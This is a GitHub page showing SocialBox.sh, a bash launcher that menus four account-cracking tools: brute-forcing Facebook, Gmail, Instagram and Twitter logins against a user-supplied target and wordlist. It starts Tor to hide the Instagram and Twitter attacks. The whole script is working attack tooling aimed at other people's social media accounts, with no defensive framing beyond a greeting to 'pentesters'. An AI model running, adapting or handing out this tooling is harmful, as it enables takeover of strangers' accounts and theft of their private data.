-
Notifications
You must be signed in to change notification settings - Fork 499
/
SocialBox.sh
154 lines (154 loc) · 4.56 KB
/
SocialBox.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
#!/bin/bash
#Colors
white="\033[1;37m"
grey="\033[0;37m"
purple="\033[0;35m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
Purple="\033[0;35m"
Cyan="\033[0;36m"
Cafe="\033[0;33m"
Fiuscha="\033[0;35m"
blue="\033[1;34m"
nc="\e[0m"
#ROOT PRIVILEGIES
if [[ $EUID -ne 0 ]]; then
echo -e "$red You don't have Root privilegies, execute the script as root.$nc"
exit 1
fi
#Installation
sleep 1
echo -e "Checking Installation $nc"
bash install-sb.sh
echo -e "Checking Completed [$green✓$nc] $nc "
sleep 1
clear
#Startup
echo -e "$green"
echo " .▄▄ · ▄▄· ▪ ▄▄▄· ▄▄▌ ▄▄▄▄· ▐▄• ▄ "
echo " ▐█ ▀. ▪ ▐█ ▌▪██ ▐█ ▀█ ██• ▐█ ▀█▪▪ █▌█▌▪"
echo " ▄▀▀▀█▄ ▄█▀▄ ██ ▄▄▐█·▄█▀▀█ ██▪ ▐█▀▀█▄ ▄█▀▄ ·██· "
echo " ▐█▄▪▐█▐█▌.▐▌▐███▌▐█▌▐█ ▪▐▌▐█▌▐▌ ██▄▪▐█▐█▌.▐▌▪▐█·█▌"
echo -e " ▀▀▀▀ ▀█▄▀▪·▀▀▀ ▀▀▀ ▀ ▀ .▀▀▀ ·▀▀▀▀ ▀█▄▀▪•▀▀ ▀▀$nc $blue v1$nc"
echo -e " [+] $red Coded By Belahsan Ouerghi$nc [+]"
echo -e " [+] $red www.facebook.com/ouerghi.belahsan$nc [+]"
echo -e " [+] $red Greetz To All Pentesters$nc [+]"
echo -e " [+]$red Special Greetz To$nc :$green {thelinuxchoice , Ha3MrX, Tunisian Eagles}$nc [+]"
echo ""
echo -e "$yellow Select From Menu : $nc"
echo ""
echo -e " $Cyan 1 : Brute Force Facebook Account$nc"
echo -e " $Cyan 2 : Brute Force Gmail Account$nc"
echo -e " $Cyan 3 : Brute Force Instagram Account$nc"
echo -e " $Cyan 4 : Brute Force Twitter Account$nc"
echo -e " $Cyan 99: Exit$nc"
read -p "Choice > " ch
if [ $ch = 1 ]; then
echo -e " $Cyan Facebook Brute Force$nc"
echo -e "$green"
read -p "Enter Facebook ID / Email / Username / Number: " id
read -p "Enter wordlist path : " wordlist
echo -e "$nc"
cd facebook
perl fb-brute.pl $id $wordlist
echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]"
echo -e "$red"
read -p "Wanna Back To Main Menu [ Y / n ] : " check
echo -e "$nc"
if [ $check = "Y" ]; then
cd .. && bash SocialBox.sh
elif [ $check = "y" ]; then
cd .. && bash SocialBox.sh
elif [ $check = "Yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check = "yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check = "YES" ]; then
cd .. && bash SocialBox.sh
else
exit 1
fi
elif [ $ch = 2 ]; then
echo -e " $Cyan Gmail Brute Force$nc"
cd Gemail-Hack
python gemailhack.py
echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]"
echo -e "$red"
read -p "Wanna Back To Main Menu [ Y / n ] : " check2
echo -e "$nc"
if [ $check2 = "Y" ]; then
cd .. && bash SocialBox.sh
elif [ $check2 = "y" ]; then
cd .. && bash SocialBox.sh
elif [ $check2 = "Yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check2 = "yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check2 = "YES" ]; then
cd .. && bash SocialBox.sh
else
exit 1
fi
elif [ $ch = 3 ]; then
echo -e " $Cyan Instagram Brute Force$nc"
cd instainsane/
sleep 0.025
echo -e " [+]$red Service Tor Stated $nc[+]"
sleep 0.9
service tor start
./instainsane.sh
echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]"
service tor stop
echo -e " [+]$red Service Tor Stopped$nc [+]"
echo -e "$red"
read -p "Wanna Back To Main Menu [ Y / n ] : " check3
echo -e "$nc"
if [ $check3 = "Y" ]; then
cd .. && bash SocialBox.sh
elif [ $check3 = "y" ]; then
cd .. && bash SocialBox.sh
elif [ $check3 = "Yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check3 = "yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check3 = "YES" ]; then
cd .. && bash SocialBox.sh
else
exit 1
fi
elif [ $ch = 4 ]; then
echo -e " $Cyan Twitter Brute Force$nc"
cd tweetshell/
sleep 0.025
echo -e " [+]$red Service Tor Stated $nc[+]"
sleep 0.9
service tor start
bash tweetshell.sh
echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]"
service tor stop
echo -e " [+]$red Service Tor Stopped$nc [+]"
echo -e "$red"
read -p "Wanna Back To Main Menu [ Y / n ] : " check4
echo -e "$nc"
if [ $check4 = "Y" ]; then
cd .. && bash SocialBox.sh
elif [ $check4 = "y" ]; then
cd .. && bash SocialBox.sh
elif [ $check4 = "Yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check4 = "yes" ]; then
cd .. && bash SocialBox.sh
elif [ $check4 = "YES" ]; then
cd .. && bash SocialBox.sh
else
exit 1
fi
elif [ $ch == 99 ]; then
echo -e "$red Program Exit ...$nc"
sleep 0.25
exit 1
else
echo "Not Found 404 , Exit"
exit 1
fi